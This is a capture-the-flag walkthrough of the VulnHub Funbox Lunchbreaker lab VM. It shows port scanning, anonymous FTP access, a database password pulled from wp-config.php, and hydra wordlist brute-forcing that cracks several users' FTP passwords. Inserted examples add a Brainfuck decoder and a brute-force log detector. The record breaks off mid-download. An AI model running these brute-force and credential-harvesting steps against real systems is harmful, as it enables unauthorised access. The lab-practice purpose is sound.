1. Environment
Box page: https://www.vulnhub.com/entry/funbox-lunchbreaker,700/
Download: https://download.vulnhub.com/funbox/FunboxLunchbreaker.ova
Difficulty: easy
Release date: 2021-05-22
File size: 1.6 GB
Author: 0815R2d2
Series: Funbox
Description: This is a beginner box that can be cracked open during a lunch break. It works better in VirtualBox than in VMware.
Time spent: 4+ hours. Nothing technically difficult, it is just very roundabout... back and forth with the same two commands... but it does offer some rather unusual ideas.
Key to the box: FTP operations and password brute-forcing
2. Host discovery and port scanning
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 3a:f9:d3:90:a4:64 (Unknown: locally administered)
192.168.56.46 08:00:27:3e:67:06 PCS Systemtechnik GmbH
2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.310 seconds (110.82 hosts/sec). 2 responded
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.46
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-30 23:04 EST
Nmap scan report for 192.168.56.46
Host is up (0.00060s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 633 May 22 2021 supers3cr3t
|_drwxr-xr-x 6 1006 1006 4096 May 22 2021 wordpress
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 1d:3d:bf:5a:e1:9f:bb:31:85:34:94:24:cf:0c:04:20 (RSA)
| 256 3b:e1:5c:97:5a:93:1d:9c:d5:02:e5:d8:15:a7:92:ea (ECDSA)
|_ 256 d6:f2:e3:da:7e:d7:3f:94:7e:3b:5d:bc:ef:ee:49:63 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:3E:67:06 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.60 ms 192.168.56.46
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.09 seconds
3. Accessing the ports
3.1. Port 21 - FTP
- Judging from the FTP directory listing, uploading a WebShell via FTP may be possible
- Password brute-forcing may also be an option; see whether a username turns up later
3.1.1. Downloading files via FTP
- Download the files "supers3cr3t" and ".s3cr3t"
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||35135|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 118 4096 May 22 2021 .
drwxr-xr-x 3 0 118 4096 May 22 2021 ..
-rw-r--r-- 1 0 0 233 May 22 2021 .s3cr3t
-rw-r--r-- 1 0 0 633 May 22 2021 supers3cr3t
drwxr-xr-x 6 1006 1006 4096 May 22 2021 wordpress
226 Directory send OK.
ftp> lcd /root/soft/hack
Local directory now: /root/soft/hack
ftp> get supers3cr3t
local: supers3cr3t remote: supers3cr3t
229 Entering Extended Passive Mode (|||35096|)
150 Opening BINARY mode data connection for supers3cr3t (633 bytes).
100% |**************************************************************| 633 594.38 KiB/s 00:00 ETA
226 Transfer complete.
633 bytes received in 00:00 (209.33 KiB/s)
ftp> get .s3cr3t
229 Entering Extended Passive Mode (|||42850|)
150 Opening BINARY mode data connection for .s3cr3t (233 bytes).
100% |**************************************************************| 233 473.05 KiB/s 00:00 ETA
226 Transfer complete.
233 bytes received in 00:00 (183.20 KiB/s)
ftp> exit
221 Goodbye.
- Download the "wordpress" directory
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# cd ~/soft/hack
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# wget -r -np -nH ftp://192.168.56.46/wordpress
--2023-12-01 00:37:23-- ftp://192.168.56.46/wordpress
=> “.listing”
正在连接 192.168.56.46:21... 已连接。
正在以 anonymous 登录 ... 登录成功!
==> SYST ... 完成。 ==> PWD ... 完成。
==> TYPE I ... 完成。 ==> 不需要 CWD。
==> PASV ... 完成。 ==> LIST ... 完成。
......
下载完毕 --2023-12-01 00:37:32--
总用时:9.3s
下载了:1566 个文件,1.9s (21.6 MB/s) 中的 41M
3.1.2. Reading and decoding "supers3cr3t" and ".s3cr3t"
- Hints obtained (they do not look useful):
Look deep into nature and then you will understand everything better.
If the radiance of a thousand suns / were to burst at once into the sky / that would be like / the splendor of the Mighty One and I am become Death, the shatterer of worlds
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ls
supers3cr3t wordpress
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat supers3cr3t
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++.>+++++++++++..----.<<++.>>-------.+..+++++++++++.<<.>>-------.+++++.++++++.-----.<<.>>-.-------------.+++++++++++++++++++.+.---.-------------.<<.>>----.+++++++++++++.----------.<<.>>++++++++++++++++.------------.---.+++++++++.<<.>>+++++++++++.----------.++++++.<<.>>++.--------------.+++..<<.>>+++++++++.-------.----------.+.+++++++++++++.+.+.-------------------.+++++++++++++.----------.<<.>>+.+++++++++++++++++.-----------------.+++++++++++++.+++++++.-----.------------.+.+++++.-------.<<.>>-----.+++.+++++++++++++++..---------------.+++++++++++++.<<++++++++++++++.------------.
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat supers3cr3t | python ../Brainfuck解码.py
解码前:++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++.>+++++++++++..----.<<++.>>-------.+..+++++++++++.<<.>>-------.+++++.++++++.-----.<<.>>-.-------------.+++++++++++++++++++.+.---.-------------.<<.>>----.+++++++++++++.----------.<<.>>++++++++++++++++.------------.---.+++++++++.<<.>>+++++++++++.----------.++++++.<<.>>++.--------------.+++..<<.>>+++++++++.-------.----------.+.+++++++++++++.+.+.-------------------.+++++++++++++.----------.<<.>>+.+++++++++++++++++.-----------------.+++++++++++++.+++++++.-----.------------.+.+++++.-------.<<.>>-----.+++.+++++++++++++++..---------------.+++++++++++++.<<++++++++++++++.------------.
解码后:Look deep into nature and then you will understand everything better."
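The author's Brainfuck解码.py script is not shown. As an added example (my own code, not the author's script), the following is a small Brainfuck interpreter that reproduces the decode of supers3cr3t above; the program text is copied from the cat output, and the function names, file name and the tape size are my own choices.

```python
import sys

BF_CHARS = set("<>+-.,[]")

# Contents of supers3cr3t exactly as printed by `cat` above.
SUPERS3CR3T = "++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++.>+++++++++++..----.<<++.>>-------.+..+++++++++++.<<.>>-------.+++++.++++++.-----.<<.>>-.-------------.+++++++++++++++++++.+.---.-------------.<<.>>----.+++++++++++++.----------.<<.>>++++++++++++++++.------------.---.+++++++++.<<.>>+++++++++++.----------.++++++.<<.>>++.--------------.+++..<<.>>+++++++++.-------.----------.+.+++++++++++++.+.+.-------------------.+++++++++++++.----------.<<.>>+.+++++++++++++++++.-----------------.+++++++++++++.+++++++.-----.------------.+.+++++.-------.<<.>>-----.+++.+++++++++++++++..---------------.+++++++++++++.<<++++++++++++++.------------."


def run_brainfuck(program, cell_count=30000):
    """Interpret a Brainfuck program (no stdin) and return what it prints as text."""
    # Pair every '[' with its ']' up front so loops jump in O(1).
    jumps, open_brackets = {}, []
    for pos, ch in enumerate(program):
        if ch == "[":
            open_brackets.append(pos)
        elif ch == "]":
            if not open_brackets:
                raise ValueError(f"unmatched ']' at offset {pos}")
            start = open_brackets.pop()
            jumps[start], jumps[pos] = pos, start
    if open_brackets:
        raise ValueError(f"unmatched '[' at offset {open_brackets[-1]}")

    tape = bytearray(cell_count)   # 8-bit cells, wrap on overflow
    ptr = pc = 0
    out = []
    while pc < len(program):
        ch = program[pc]
        if ch == ">":
            ptr += 1
            if ptr >= cell_count:
                raise IndexError("data pointer ran off the end of the tape")
        elif ch == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("data pointer moved before the start of the tape")
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(chr(tape[ptr]))
        elif ch == ",":
            tape[ptr] = 0              # no input available: treat as EOF -> 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]             # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]             # back to the matching '['
        pc += 1                        # any other byte is a comment
    return "".join(out)


def looks_like_brainfuck(text, min_fraction=0.9):
    """Quick triage check: is this blob mostly Brainfuck opcodes?"""
    body = "".join(text.split())
    return bool(body) and sum(c in BF_CHARS for c in body) / len(body) >= min_fraction


if __name__ == "__main__":
    # Same usage as the author's pipeline: cat supers3cr3t | python brainfuck_decode.py
    sys.stdout.write(run_brainfuck(sys.stdin.read()) + "\n")
```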
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat .s3cr3t
SWYgdGhlIHJhZGlhbmNlIG9mIGEgdGhvdXNhbmQgc3VucyAvIHdlcmUgdG8gYnVyc3QgYXQgb25jZSBpbnRvIHRoZSBza3kgLyB0aGF0IHdvdWxkIGJlIGxpa2UgLyB0aGUgc3BsZW5kb3Igb2YgdGhlIE1pZ2h0eSBPbmUgYW5kIEkgYW0gYmVjb21lIERlYXRoLCB0aGUgc2hhdHRlcmVyIG9mIHdvcmxkcw==
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat .s3cr3t | base64 -d
If the radiance of a thousand suns / were to burst at once into the sky / that would be like / the splendor of the Mighty One and I am become Death, the shatterer of worlds
3.1.3. Searching the "wordpress" directory contents
- Searching for the database password
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧
└─# grep -ri -E 'DB_PASSWORD' *
wp-admin/setup-config.php: define( 'DB_PASSWORD', $pwd );
wp-admin/setup-config.php: case 'DB_PASSWORD':
wp-config.php:define( 'DB_PASSWORD', 'JuZhRbNNk.()' );
wp-config-sample.php:define( 'DB_PASSWORD', 'passwort_hier_einfuegen' );
wp-includes/load.php: $dbpassword = defined( 'DB_PASSWORD' ) ? DB_PASSWORD : '';
- Obtained two sets of database credentials. 10.10.10.12 is not a local IP address, so there may be a container
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧
└─# cat wp-config.php
<?php
......
define( 'DB_NAME', 'wpdb' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'JuZhRbNNk.()' );
define( 'DB_HOST', '10.10.10.12' );
define( 'DB_CHARSET', 'utf8' );
define('DB_COLLATE', '');
......
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧
└─# cat wp-config-sample.php
<?php
......
define( 'DB_NAME', 'datenbankname_hier_einfuegen' );
define( 'DB_USER', 'benutzername_hier_einfuegen' );
define( 'DB_PASSWORD', 'passwort_hier_einfuegen' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8' );
define('DB_COLLATE', '');
......
3.2. Port 22 - SSH
- Initial login attempt to check for any usable hints
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧
└─# ssh 192.168.56.46
The authenticity of host '192.168.56.46 (192.168.56.46)' can't be established.
ED25519 key fingerprint is SHA256:A887jwxDkjOcXiGyfxtQS9gU3vV0CwSl3h7KaSGiOjY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.46' (ED25519) to the list of known hosts.
root@192.168.56.46's password:
3.3. Port 80 - Web
- Two pieces of information obtained
  - Possible usernames: j.miller, jane, miller
  - Possible e-mail address: jane@funbox8.ctf
- Background image: there may be steganography, but it is low priority; come back to the image if no other leads turn up
<!-- webdesign by j.miller [jane@funbox8.ctf] -->
4. Directory scanning
- The directory names in robots.txt are interesting: dirb and gobuster are both directory scanning tools; etc is the directory holding Linux system configuration files; WYSIWYG stands for "what you see is what you get"
# Basic small wordlist, first pass
dirb http://192.168.56.46
# More thorough (conda activate py37)
dirsearch -u http://192.168.56.46 -t 64 -e *
# More thorough, Plus (conda activate py39)
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.56.46 -lcf
- http://192.168.56.46/index.html
- http://192.168.56.46/robots.txt
4.1. Scanning the "robots" directories (squeaky clean, nothing at all...)
- So that is what "what you see is what you get" means: it tells us there is no need for directory scanning...
- But without scanning them yourself, who knows whether it is a red herring. (╯°□°)╯︵┻━┻
gobuster dir -u http://192.168.56.46/dirb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
gobuster dir -u http://192.168.56.46/gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
gobuster dir -u http://192.168.56.46/etc -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
gobuster dir -u http://192.168.56.46/WYSIWYG -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
5. Fine, let's analyse the image...
- Download the image
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# wget http://192.168.56.46/image.jpg
--2023-12-01 02:17:30-- http://192.168.56.46/image.jpg
正在连接 192.168.56.46:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:7053571 (6.7M) [image/jpeg]
正在保存至: “image.jpg”
image.jpg 100%[=======================================>] 6.73M --.-KB/s 用时 0.07s
2023-12-01 02:17:30 (99.5 MB/s) - 已保存 “image.jpg” [7053571/7053571])
5.1. Local image analysis
5.1.1. steghide (failed)
- Inspect the image info (found that a passphrase is set)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# steghide info image.jpg
"image.jpg":
format: jpeg
capacity: 376.0 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
- First passphrase brute-force (failed)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# stegseek image.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.59% (132.9 MB)
[!] error: Could not find a valid passphrase.
- Second attempt, seed brute-force (failed)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# stegseek --seed image.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.99% (4294720000 seeds)
[!] error: Could not find a valid seed.
5.1.2. binwalk (failed)
- Extracting embedded files (failed)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# binwalk -e image.jpg --run-as=root
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, EXIF standard
12 0xC TIFF image data, little-endian offset of first image directory: 8
8566 0x2176 Copyright string: "Copyright (c) 1998 Hewlett-Packard Company"
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ls
image.jpg reports supers3cr3t wordpress
5.1.3. foremost (failed)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# foremost image.jpg
Processing: image.jpg
|*|
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# tree -a output
output
├── audit.txt
└── jpg
└── 00000000.jpg
2 directories, 2 files
5.2. Online image analysis (likewise, nothing found)
StegOnline
6. SSH password brute-force (FTP brute-force run in parallel)
- At this point there is (initially) nothing else to work with; the only lead left is the possible username jane
- If that still fails, the only option is to switch wordlists and redo the directory scanning and password brute-forcing
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# hydra -l jane -P /usr/share/wordlists/rockyou.txt -t 64 192.168.56.46 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 02:46:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.56.46:22/
[STATUS] 378.00 tries/min, 378 tries in 00:01h, 14344056 to do in 632:28h, 29 active
[STATUS] 218.00 tries/min, 654 tries in 00:03h, 14343785 to do in 1096:38h, 24 active
...... Failed; nothing was cracked
7. FTP password brute-force
- Cracked password: login: jane password: password
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# hydra -l jane -P /usr/share/wordlists/rockyou.txt -t 64 192.168.56.46 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 02:56:18
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ftp://192.168.56.46:21/
[21][ftp] host: 192.168.56.46 login: jane password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-01 02:56:24
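From the defender's side, the hydra runs against SSH (section 6) and FTP (this section) leave a distinctive trail in vsftpd.log and in sshd's auth.log entries. The following is an added example, not from the write-up or the box: it parses both log formats and raises an alert once failures from one source pile up inside a short window, and a second alert when a login from that source later succeeds. The log lines are constructed samples; the function names and thresholds are my own.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# vsftpd.log line (vsftpd's own log format, not xferlog), e.g.
#   Fri Dec  1 02:56:18 2023 [pid 3000] [jane] FAIL LOGIN: Client "192.168.56.3"
VSFTPD_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<res>OK|FAIL) LOGIN: Client "(?P<src>[^"]+)"'
)
# sshd line from auth.log (syslog format, no year), e.g.
#   Dec  1 02:46:21 funbox8 sshd[2087]: Failed password for jane from 192.168.56.3 port 40176 ssh2
SSHD_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<res>Accepted|Failed) password '
    r'for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)'
)


def parse_line(line, year=2023):
    """Return (timestamp, service, user, src_ip, success) for a login line, else None."""
    m = VSFTPD_RE.match(line)
    if m:
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        return ts, "ftp", m["user"], m["src"], m["res"] == "OK"
    m = SSHD_RE.match(line)
    if m:
        # syslog timestamps carry no year; the caller supplies it (assumption)
        ts = datetime.strptime(f'{year} {m["ts"]}', "%Y %b %d %H:%M:%S")
        return ts, "ssh", m["user"], m["src"], m["res"] == "Accepted"
    return None


def detect_bruteforce(lines, threshold=10, window_s=60, year=2023):
    """Alert once a (service, source) pair reaches `threshold` failed logins inside
    `window_s` seconds, and again if that source later logs in successfully: the
    second alert is the one that says the guessing worked."""
    failures = defaultdict(deque)  # (service, src) -> recent failure timestamps
    flagged = set()                # (service, src) pairs already reported
    alerts = []
    for line in lines:
        ev = parse_line(line, year)
        if ev is None:
            continue
        ts, svc, user, src, ok = ev
        key = (svc, src)
        if ok:
            if key in flagged:
                alerts.append(f"{svc}: successful login as '{user}' from {src} after brute-force burst")
            continue
        recent = failures[key]
        recent.append(ts)
        while recent and (ts - recent[0]).total_seconds() > window_s:
            recent.popleft()  # drop failures that fell out of the window
        if len(recent) >= threshold and key not in flagged:
            flagged.add(key)
            alerts.append(f"{svc}: {len(recent)} failed logins from {src} within {window_s}s")
    return alerts


# Constructed sample: 12 FTP failures for jane in 12 seconds, then the successful
# login, plus two isolated SSH failures and one ordinary SSH login.
SAMPLE_LOG = [
    f'Fri Dec  1 02:56:{18 + i:02d} 2023 [pid {3000 + i}] [jane] FAIL LOGIN: Client "192.168.56.3"'
    for i in range(12)
] + [
    'Fri Dec  1 02:56:30 2023 [pid 3012] [jane] OK LOGIN: Client "192.168.56.3"',
    'Dec  1 02:46:21 funbox8 sshd[2087]: Failed password for jane from 192.168.56.3 port 40176 ssh2',
    'Dec  1 02:46:22 funbox8 sshd[2089]: Failed password for invalid user admin from 192.168.56.3 port 40178 ssh2',
    'Dec  1 09:26:58 funbox8 sshd[2150]: Accepted password for john from 192.168.56.7 port 50102 ssh2',
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```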
7.1. Downloading files
- The current FTP directory structure looks like a Linux user's /home directory
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): jane
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||57051|)
150 Here comes the directory listing.
dr-x------ 3 1002 1002 4096 May 22 2021 .
drwxr-xr-x 6 0 0 4096 May 22 2021 ..
-rw-r--r-- 1 1002 1002 220 May 22 2021 .bash_logout
-rw-r--r-- 1 1002 1002 3771 May 22 2021 .bashrc
-rw-r--r-- 1 1002 1002 807 May 22 2021 .profile
drwxr-xr-x 2 1002 1002 4096 May 22 2021 backups
226 Directory send OK.
ftp> cd backups
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||44799|)
150 Here comes the directory listing.
drwxr-xr-x 2 1002 1002 4096 May 22 2021 .
dr-x------ 3 1002 1002 4096 May 22 2021 ..
-rw-r--r-- 1 1002 1002 59 May 22 2021 keys.txt
226 Directory send OK.
ftp> get keys.txt
local: keys.txt remote: keys.txt
229 Entering Extended Passive Mode (|||19248|)
150 Opening BINARY mode data connection for keys.txt (59 bytes).
100% |*********************************************************| 59 0.98 MiB/s 00:00 ETA
226 Transfer complete.
59 bytes received in 00:00 (45.72 KiB/s)
- No idea yet what keys.txt is for; probably some kind of password
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat keys.txt
kJGgh-kiu65-zghku-76zzt-hgf56
llij8-fgzZ-rTzU1-ddfgz-i876S
7.2. It looks like /home; verify
- Sure enough... it is
ftp> ls -al
229 Entering Extended Passive Mode (|||32072|)
150 Here comes the directory listing.
dr-x------ 3 1002 1002 4096 May 22 2021 .
drwxr-xr-x 6 0 0 4096 May 22 2021 ..
-rw-r--r-- 1 1002 1002 220 May 22 2021 .bash_logout
-rw-r--r-- 1 1002 1002 3771 May 22 2021 .bashrc
-rw-r--r-- 1 1002 1002 807 May 22 2021 .profile
drwxr-xr-x 2 1002 1002 4096 May 22 2021 backups
226 Directory send OK.
ftp> pwd
Remote directory: /home/jane
ftp> cd ../
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||16839|)
150 Here comes the directory listing.
drwxr-xr-x 6 0 0 4096 May 22 2021 .
drwxr-xr-x 20 0 0 4096 May 22 2021 ..
dr-x------ 3 1002 1002 4096 May 22 2021 jane
dr-x------ 3 1001 1001 4096 May 22 2021 jim
dr-x------ 4 1000 1000 4096 May 22 2021 john
drwx------ 4 1003 1003 4096 May 22 2021 jules
226 Directory send OK.
7.3. Information gathering as user jane
- Nothing much; we just learned that four users exist: jane, jim, john, jules
ftp> cd jim
550 Failed to change directory.
ftp> cd john
550 Failed to change directory.
ftp> cd jules
550 Failed to change directory.
7.4. FTP operations are limited; try brute-forcing the other three users' passwords
- login: jane password: password
- login: jim password: 12345
- john: brute-force failed
- login: jules password: sexylady
# Not recommended to brute-force them all in one run: if one of them cannot be cracked, the whole run waits a very long time
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat user
jane
jim
john
jules
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# hydra -L user -P /usr/share/wordlists/rockyou.txt -t 64 192.168.56.46 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 03:34:43
[DATA] max 64 tasks per 1 server, overall 64 tasks, 57377596 login tries (l:4/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.46:21/
[21][ftp] host: 192.168.56.46 login: jane password: password
[21][ftp] host: 192.168.56.46 login: jim password: 12345
......(For a long, long time)
[21][ftp] host: 192.168.56.46 login: jules password: sexylady
7.5. Logging in to FTP as jim
- Both SSH-related files are empty
- Uploading files is also forbidden
- So this user is not of much use
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): jim
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||15289|)
150 Here comes the directory listing.
dr-x------ 3 1001 1001 4096 May 22 2021 .
drwxr-xr-x 6 0 0 4096 May 22 2021 ..
-rw-r--r-- 1 1001 1001 220 May 22 2021 .bash_logout
-rw-r--r-- 1 1001 1001 3771 May 22 2021 .bashrc
-rw-r--r-- 1 1001 1001 807 May 22 2021 .profile
dr-xr-xr-x 2 1001 1001 4096 May 22 2021 .ssh
226 Directory send OK.
ftp> cd .ssh
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||26295|)
150 Here comes the directory listing.
dr-xr-xr-x 2 1001 1001 4096 May 22 2021 .
dr-x------ 3 1001 1001 4096 May 22 2021 ..
-rw-r--r-- 1 1001 1001 0 May 22 2021 authorized_keys
-r-------- 1 1001 1001 0 May 22 2021 id_rsa
226 Directory send OK.
ftp> put passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||20802|)
550 Permission denied.
7.6. Logging in to FTP as jules
- Found two wordlists
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): jules
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||40874|)
150 Here comes the directory listing.
drwx------ 4 1003 1003 4096 May 22 2021 .
drwxr-xr-x 6 0 0 4096 May 22 2021 ..
drwx------ 2 1003 1003 4096 May 22 2021 .backups
-rw------- 1 1003 1003 10 May 22 2021 .bash_history
-rw-r--r-- 1 1003 1003 220 May 22 2021 .bash_logout
-rw-r--r-- 1 1003 1003 3771 May 22 2021 .bashrc
drwx------ 2 1003 1003 4096 May 22 2021 .cache
-rw-r--r-- 1 1003 1003 807 May 22 2021 .profile
226 Directory send OK.
ftp> cd .cache
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||63865|)
150 Here comes the directory listing.
drwx------ 2 1003 1003 4096 May 22 2021 .
drwx------ 4 1003 1003 4096 May 22 2021 ..
-rw-r--r-- 1 1003 1003 0 May 22 2021 motd.legal-displayed
226 Directory send OK.
ftp> cd ../
250 Directory successfully changed.
ftp> cd .backups
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||52228|)
150 Here comes the directory listing.
drwx------ 2 1003 1003 4096 May 22 2021 .
drwx------ 4 1003 1003 4096 May 22 2021 ..
-r-------- 1 1003 1003 139921517 May 22 2021 .bad-passwds
-r-------- 1 1003 1003 0 May 22 2021 .forbidden-passwds
-r-------- 1 1003 1003 562 May 22 2021 .good-passwd
-r-------- 1 1003 1003 0 May 22 2021 .very-bad-passwds
226 Directory send OK.
ftp> lpwd
Local directory: /root/soft/hack
ftp> mget .bad-passwds .good-passwd
mget .bad-passwds [anpqy?]?
229 Entering Extended Passive Mode (|||36078|)
150 Opening BINARY mode data connection for .bad-passwds (139921517 bytes).
